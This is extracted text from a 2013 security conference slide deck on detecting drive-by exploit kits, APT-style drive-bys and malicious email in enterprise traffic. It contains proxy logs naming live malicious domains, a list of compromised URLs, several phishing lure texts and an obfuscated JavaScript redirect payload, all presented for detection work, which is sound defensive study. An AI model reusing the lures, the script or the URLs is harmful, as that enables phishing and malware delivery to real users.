phd iii - defending enterprise

DISSECTING RAW DATA: finding needles in the haystack

or the way to survive in the Dangerous Russian Environment

Fyodor Yarochkin Vladimir Kropotov Vitaly Chetvertakov May 2013, Moscow

About the speakers

Common interest: investigating unlawful activities for fun and profit ;-)

We can't spell. All mistakes are ours :)All the pictures used in this prezo are (c) googled ;-)

Agenda

●Methodology of dealing with emerging threats●Case studies●Automation techniques and tools●Q&A

Overview

● Understand threats● Real time visibility● You owned. Your

actions?● Owned: finding who

targets you, what data they want. What's been compromised

Prepare

Protect

Investigate

Detect

Getting ready :)

PREPARE

Initial network compromise: threats

●DbD attacks●Email as attack vector●Direct attacks against servers

Client-targeting attacks are on the rise

EASY!

Bigger number of

targets!

Users cumulative IQ

< 0! ;-)

Drive-By in Nutshell :)

● Visit an infected site (any banner network can be a lead too)

● Traffic distribution/TDS (not compulsory)● Target Identification (javascript exploit

selection)● Exploit● Payload (.exe)● Profit!

STILLBIG!!

DBD attacks

● Easy to collect samples

● Payload sent over the wire in plain

● Easy to automate analysis with sandbox

● Payload is typically encoded (XOR) or encrypted

● Exploit triggered on user events

● Serve once per IP, Blacklisting

Before... Now

APT!APT!

APT!

APT!

APT!

APT! APT! APT!APT!

APT!

APT!APT!

APT!

APT!

APT!

So, what is APT?

Someone wants YOUR stuff :-)

Drive by .. are you a target?

● A single exploit● Served to limited

range of IP address (some times)

● Payload behavior is very specific

● Exploit packs● Generic Exploit

packs (Redkit, Nitrino, famous Blackhole etc)

● Payload vary

APT Not APT

APT-related driveby example

● Does not include many exploits

● Is not using any off-shelf exploit pack

● Exploit code changes

often

APT example cont..

● Binary pattern payload. VM sandbox detection

Call-back analysis

Bot vs Human

Exploit packs and kits

Bodyless Bot

GET;http://demonsstoryboard.pw/80F5;HTTP/1.1

95.211.7.3

200 57505 http://234x120.adv.vz.ru/cgi-bin/iframe/vz?1787&options=N

Mozilla/4.0;(compatible;;MSIE;7.0;;Windows;NT;6.1)

text/html

GET;http://demonsstoryboard.pw/080F5wj;HTTP/1.1

95.211.7.3

200 20380 - Mozilla/4.0;(Windows;7;6.1);Java/1.7.0_07

application/java-archive

GET;http://demonsstoryboard.pw/180F5wj;HTTP/1.1

95.211.7.3

200 135534 - Java/1.7.0_07 application/octet-stream

Exploit kits in your log

Crosss-domain

GET;http://teware.info/crossdomain.xml;HTTP/1.1

62.109.7.187 200

391 Mozilla/4.0;(compatible;;MSIE;7.0;;Windows)

text/xml

GET;http://teware.info/counter/hit/client_de5df061c99066d82cfc437f2b099455;HTTP/1.1

62.109.7.187 200

826 http://www.divetour.su/admin/lang/EN/logit.swf


text/html

GET;http://isxops.info/ocycytyruwewufibegidutivabi;HTTP/1.1

82.146.56.201

200

27206 http://www.divetour.su/


text/html

GET;http://tolizuhifa.ghmarspi.in.ua/izijyqyzoxym;HTTP/1.1

188.120.230.94

200

9926 Mozilla/4.0;(Windows;7;6.1);Java/1.7.0_07

application/3dr

GET;http://tolizuhifa.ghmarspi.in.ua/ebyhoducibe;HTTP/1.1

188.120.230.94

200

164332

Mozilla/4.0;(Windows;7;6.1);Java/1.7.0_07

application/executable

GET;http://dapru.crackedsidewalks.com/viewforum.php?b=75c3d28;HTTP/1.1

37.9.52.21

200

949

http://verygoodcom.net/forum/viewtopic.php?f=31363995&t=45869451


text/html

GET;http://dapru.crackedsidewalks.com/profile.php?exp=atom&b=75c3d28&k=eb5e2a99b9c4326e02b6e9efbe139972;HTTP/1.1

37.9.52.21

200

647

- Mozilla/4.0;(Windows;7;6.1);Java/1.7.0_07


GET;http://dapru.crackedsidewalks.com/y41gr.php?exp=atom&b=75c3d28&k=eb5e2a99b9c4326e02b6e9efbe139972;HTTP/1.1

37.9.52.21

403

295

- Mozilla/4.0;(Windows;7;6.1);Java/1.7.0_07

-

Get 0wned quick!

Domain-rotation techniques

http://olgaclaroto.com/mikcxwe.php

http://fcslavutich.ck.ua/nmwdbvg.php

http://temizayakkabi.com/larwyyo.php

http://familystori.com/mhwrdaw.php

http://www.residensea.jp/xuaioxc.php

http://firenzeviaroma.ru/dqryony.php

http://sphynxtoutnu.com/dnqaibb.php

http://www.icmjapan.co.jp/dgttcnm.php

http://www.controlseal.nl/yolelkx.php

http://ural.zz.mu/ledstsn.php

http://www.fotobit.pl/cpjjpei.php

http://bgcarshop.com/tgghhvy.php

http://www.borkowski.org/fudbqrf.php

http://shop.babeta.ru/puthnkn.php

http://e-lustrate.us/mycbbni.php

http://notarypublicconcept.com/shfvtpx.php

http://www.stempelxpress.nl/vechoix.php

http://64.68.190.53/dqohago.php

http://likos.orweb.ru/oydochh.php

http://wap.warelex.com/parpkeu.php

http://caglayandalgicpompa.com/vgptlav.php

http://v-madrid.ru/iqsjnvl.php

http://www.tamandhiep.com/caectvo.php

http://bulgurluhamami.com/wyscthy.php

http://pcprint.es/xymijte.php

http://genckoltukdoseme.com/jydudjd.php

http://www.mgftools.com/fakmgbv.php

http://ohtparis.com/msmfguo.php

http://kenankocticaret.com/myrivrk.php

http://restaurangmaskiner.net/rwuwkqx.php

http://fvp.nau.edu.ua/uhetymf.php

http://kontra-antiabzocker.net/xubolww.php

http://artmaster39.ru/jtfsajd.php

http://drcalotti.com/llfisbj.php

http://adult-toy.ru/immjdti.php

http://corumhaberi.com/ugfrcal.php

http://opr.kz/jwcxbwi.php

http://peggysmith.nl/thtaywn.php

http://nic-ram.com/jqdkfrh.php

http://minsociety.org/djafssg.php

Domain rotation victims

● Over 500 compromised domains in 24 hours

● Domain rotation once per minute (3 minutes in the other incident)

TDS injections

GET;http://ctgwllr.changeip.name/googlestat.php;HTTP/1.1

37.10.104.72

200

640

http://www.english-shoes.ru/products/41/


text/html

GET;http://ctgwllr.changeip.name/uqrojdt/2;HTTP/1.1 37.10.104.72

200

442

http://www.english-shoes.ru/products/41/


text/html

GET;http://qxcrr-xerox.janitorbe.biz/stranger-constructing-restoring.html;HTTP/1.1

31.7.184.194

200

1578

3

http://ctgwllr.changeip.name/uqrojdt/2


text/html

GET;http://qxcrr-xerox.janitorbe.biz/a544444444ZZZZZZZZwwwwwww/9d20Z7eQ7QeQe/citizen.php5;HTTP/1.1

31.7.184.194

200

466

http://qxcrr-xerox.janitorbe.biz/stranger-constructing-restoring.html


text/html

GET;http://qxcrr-xerox.janitorbe.biz/7ll05ywogDrmqqQeZrZwDGooerrraQq/901212121255;HTTP/1.1

31.7.184.194

200

1001

http://qxcrr-xerox.janitorbe.biz/a544444444ZZZZZZZZwwwwwww/9d20Z7eQ7QeQe/citizen.php5


text/html

GET;http://qxcrr-xerox.janitorbe.biz/7ll05ywogDrmqqQeZrZwDGooerrraQq/text.jar;HTTP/1.1

31.7.184.194

200

8772


application/x-jar

GET;http://qxcrr-xerox.janitorbe.biz/7ll05ywogDrmqqQeZrZwDGooerrraQq/0256000045/6799928;HTTP/1.1

31.7.184.194

200

8636

4



Electronic Mail as attack vector

● Email is another common method for an adversary to put a foot into the target network.

● Attractiveness:● Low profile (you only send emails to those

who you want to comromise)● Easy antivirus bypass (password-packed zip

archives anyone?:)● Users are generally – idiots ;-)

Email as attack vector.. are you a target?

● Single exploit● Content of the mail is

accurate to context● Specific payload

behavior (stats)

● Mass-mailed● Often no exploit used

(.exe in attach)

APT? Non-targeted

APT through email.. An RTF document

(CVE-2012-0158 - "MSCOMCTL.OCX RCE Vulnerability." )

Payload writes a dll fileRecent build date (2013)Autorun for persistence

Calls back to C2 server groupSuspicious user Agents:

Mozilla/4.0 (compatible; MSIE 6.0.1.3; Windows NT 5.0.3)

Mozilla/4.0 (compatible; MSIE 5.0.2) Mozilla/4.0 (compatible)

How to catch...

● Suspicious agents – works nicely (and easy to implement with snort, surricata, etc)

● Time-series traffic analysis

Emerging Threats has a large number of APT related sigs. Take-and-modify :)

Owning a network..

● Vulnerabilities seen in use through this attack vector:

Adobe Acrobat readerCVE-2013-0640CVE-2012-0775Adobe flash playerCVE-2012-1535

MS OfficeCVE-2012-0158CVE-2011-1269CVE-2010-3333CVE-2009-3129

JavaCVE-2013-0422CVE-2012-1723CVE-2012-5076

But...

● Human stupidity is exploited more than ever..

Email with a password protected archive or a document

● Password protected archives bypass AV checks, firewall/WAF/.. detection

● No exploit. Executable File is masked as document (icon, extension)

● Message contents motivates user to open the attachment (social engineering)

Добрый день, По результатам проверки, у нашей фирмы обнаружился долг перед Вами за январь насумму 9540 рубл. Наш главбух составила акт сверки и просит подписать данный акти выслать его скан. А также спрашивает, что лучше написать при переводе средств._____________________________________________________________________________________

С уважением, комерческий директор ОАО "М-ТОРГ"Маркина Ольга Алексеевна

ps. акт сверки в приложении к письму, пароль к архив 111

Lets look at some examples

Добрый день,По результатам аудиторской проверки, у нашей фирмы обнаружился долг пере Вами задекабрь 2012г. в сумме 49540 рубл. Наш главбух составила акт сверки и просит подписатьданный акт и выслать его скан. А также спрашивает, что лучше написать при переводесредств. _______________________________________________________________________________

С уважением, бухгалтер ЗАО "МСК"Калинина Вера Владимировна

ps. акт сверки в приложении к письму, пароль к архиву 123

Examples (cont...)

Good afternoon, According to the results of the audit, our firm will transfer the debt to you for? December 2012. in the sum of 49540 rubles. Our chief accountant make an act of reconciliation and asked to sign the act and send it’s scan. ______________________________________________________________________________Sincerely, Accountant of "MSK"? Vera V. Kalinina P.s. statement attached to the letter, the password for the archive 123

Unpacked file

.. and inside archive :)

Subject: British Airways E-ticket receiptse-ticket receiptBooking reference: 05V9363845Dear,Thank you for booking with British Airways.Ticket Type: e-ticketThis is your e-ticket receipt. Your ticket is held in our systems, you will not receive a paper ticket for your booking.Your itinerary is attached (Internet Exlplorer/Mozilla Firefox file)Yours sincerely,British Airways Customer ServicesBritish Airways may monitor email traffic data and also the content of emails, where permitted by law, for the purposes of security and staff training and in order to prevent or detect unauthorised use of the British Airways email system.British Airways Plc is a public limited company registered in England and Wales. Registered number: 89510471. Registered office: Waterside, PO Box 365, Harmondsworth, West Drayton, Middlesex, England, UB7 0GB.How to contact usAlthough we are unable to respond to individual replies to this email we have a comprehensive section that may help you if you have a question about your booking or travelling with British Airways.If you require further assistance you may contact usIf you have received this email in errorThis is a confidential email intended only for the British Airways Customer appearing as the addressee. If you are not the intended recipient please delete this email and inform the snder as soon as possible. Please note that any copying, distribution or other action taken or omitted to be taken in reliance upon it is prohibited and may be unlawful.

Another example

Another variation: email that contains masked links to malicious

pages•No attachment. The message text is html/text points to the same resource

•All links are 'masked' to be pointing to legit links

•The same attreactive text of the message

<body>

<h1><b>Please wait. You will be forwarded.. . </h1></b>

<h4>Internet Explorer / Mozilla Firefox compatible only</h4><br>

<script>ff=String;fff="fromCharCode";ff=ff[fff];zz=3;try{document.body&=5151}catch(gdsgd){v="val";if(document)try{document.body=12;}catch(gdsgsdg){asd=0;try{}catch(q){asd=1;}if(!asd){w={a:window}.a;vv="e"+v;}}e=w[vv];if(1){f=new Array(118,96,112,49,60,50,57,58,8,118,96,112,50,60,116,97,113,47,59,9,103,102,39,116,97,113,47,61,60,116,97,113,48,41,31,121,100,110,97,117,108,99,110,115,44,108,110,97,97,115,103,111,109,59,34,103,114,116,111,56,47,46,100,111,113,115,109,44,106,97,45,112,117,57,54,48,55,46,47,101,109,114,116,107,47,107,103,110,106,113,47,98,109,108,116,107,110,45,110,104,111,32,59,124);}w=f;s=[];if(window.document)for(i=2-2;-i+104!=0;i+=1){j=i;if((031==0x19))if(e)s=s+ff(w[j]+j%zz);}xz=e;if(v)xz(s)}</script>

</body>

</html>

Encoded redirect..

Hot topic for big company, Cyprus Crisis

Diana Ayala saw this story on the BBC News website and thought you should see it. ** Cyprus bailout: bank levy passed parliament already! **Cyprus can amend terms to a bailout deal that has sparked huge public anger....< http://www.bbc.com.us/go/em/news/world-cyprus-57502820> ** BBC Daily E-mail **Choose the news and sport headlines you want - when you want them, all in one daily e-mail< http://www.bbc.co.uk/email> ** Disclaimer **The BBC is not responsible for the content of this e-mail, and anything written in this e-mail does not necessarily reflect the BBC's views or opinions. Please note that neither the e-mail address nor name of the sender have been verified. If you do not wish to receive such e-mails in the future or want to know more about the BBC's Email a Friend service, please read our frequently asked questions by clicking here

http://go-my.ru/cyprus_news.html




This message is to notify you that your package has been processed and is on schedule for delivery from ADP. Here are the details of your delivery:Package Type: QTR/YE ReportingCourier: UPS GroundEstimated Time of Arrival: Tusesday, 5:00pmTracking Number (if one is available for this package): 1Z023R961390411904Details: Click here to view and/or modify orderWe will notify you via email if the status of your delivery changes.--------------------------------------------------------------------------------Access these and other valuable tools at support.ADP.com:o Payroll and Tax Calculatorso Order Payroll Supplies, Blank Checks, and moreo Submit requests online such as SUI Rate Changes, Schedule Changes, and moreo Download Product Documentation, Manuals, and Formso Download Software Patches and Updateso Access Knowledge Solutions / Frequently Asked Questionso Watch Animated Tours with Guided Input InstructionsThank You,ADP Client Servicessupport.ADP.com--------------------------------------------------------------------------------

This message and any attachments are intended only for the use of the addressee and may contain information that is privileged and confidential. If the reader of the message is not the intended recipient or an authorized representative of the intended recipient, you are hereby notified that any dissemination of this communication is strictly prohibited. If you have received this communication in error, notify the sender immediately by return email and delete the message and any attachments from your system.

http://ibabystar.com/new/bbs/data/adpsecur.html




What happens if you click..

So once we have the basic knowledge, lets move on :)

DETECT

We will spend a bit more time discussing detection activities.

Because this is what we primarily do :)

So how you detect attacks in your traffic..

What to look for..• Search for randomly generated

domains• Search for 3rd level domains with

dynamic dns prefixes (dyndns, dnsdojo and e.t.c.)

• Search by known malware IPs• Search by known constant parts in

URLs and domain names• Search by intermediate domains that

used in attack

• Banner networks simulation• DGA generated domains• Compromised domains• dyndns• Time-based redirects (9 till 6pm Moscow time)• Using not standard ports • Once per IP per day• Blacklists (Yes! They blacklist us too)

Common Counter-Detection Techniques

1)MIME type • application\java-archive,

application\x-jar, application\3dr for Java Exploits

• application\PDF for Acrobat reader Exploits

• application\x-shockwave-flash for adobe flash player

2) User agent (Mozilla(Windows ...)•

Things to look for..

Example..

• Exploit code/Malware components in Temp folder• activity of installer malware• Detect bruteforce attacks for standard a/c: admin, guest• Look for other suspicious IDS events

HTTP_Probe, SMB_Probes etc

Other things to pay attention to...

Antivirus find exploit in cache -> we was attacked -> antivirus saves us! ;-)

The exploit can be in cache – AV finds it :)

AV logs – useful ;)

Antivirus detect malware modules

PROTECT

Approaches

Identify impactand isolate impacted machines

Exploit features of exploit kits to immunize your network

Attacker wants to serveonce per IP...

● Automate visits to exploit pack serving points from your Client Honeybox/VM.

● Magic – exploit is not served to your users anymore.

Exploiting Redundancy Properties in the malware

distribution and postinfection

activities campaigns

INVESTIGATE

DNSLyzer

http://github.com/fygrave/dnslyzer/

Not only payload used as transition (covert channel in URL)

● GET hxxp://lionsholders.biz/st.php?os=windows%207&browser=msie&browserver=8.0& adobe%20reader=10.1&adobe%20flash=11.7.700.169&windows%20media%20player=12.0.7601.17514&java=0&silverlight=0

GET READY FOR AV TROLL!! :)

Strange things happen on the wire;)

Useful tools

● AOL Moloch https://github.com/aol/moloch

APT mail

● Xecure-lab APT document scanner

Encrypted payload in not targeted attacks

● If full attack session was not collected (e.g. traffic dumps) don't waste vendors time

● Block all unrecognized/ uncategorized content (Default Deny) or you get FN at all intermediate (transit) hosts

Be careful to share/check online samples especially for targeted

attacks

● Vendors are sharing while attackers monitor changes

● FP ~ your shared some internal staff (especially not executable files, like office documents) with third party = security policy violation

Monitoring VS Protection

● Strange, but true

Efficiency(Monitoring)~O(1/ Efficiency(Protection))

Incident Mitigation VS Investigation

● If your preparation is not enough

Efficiency(Mitigation)~ O(1/ Efficiency(Investigation))

● If you prepared, almost all steps of Investigation you can do asynchronously

Tracking Activity in the organization in 3rd party networks

● Examples in the presentation related to incidents in the third party networks and reproduced in the attacker desirable, but adopted environment.

DISCLAIMER

phd iii - defending enterprise

Business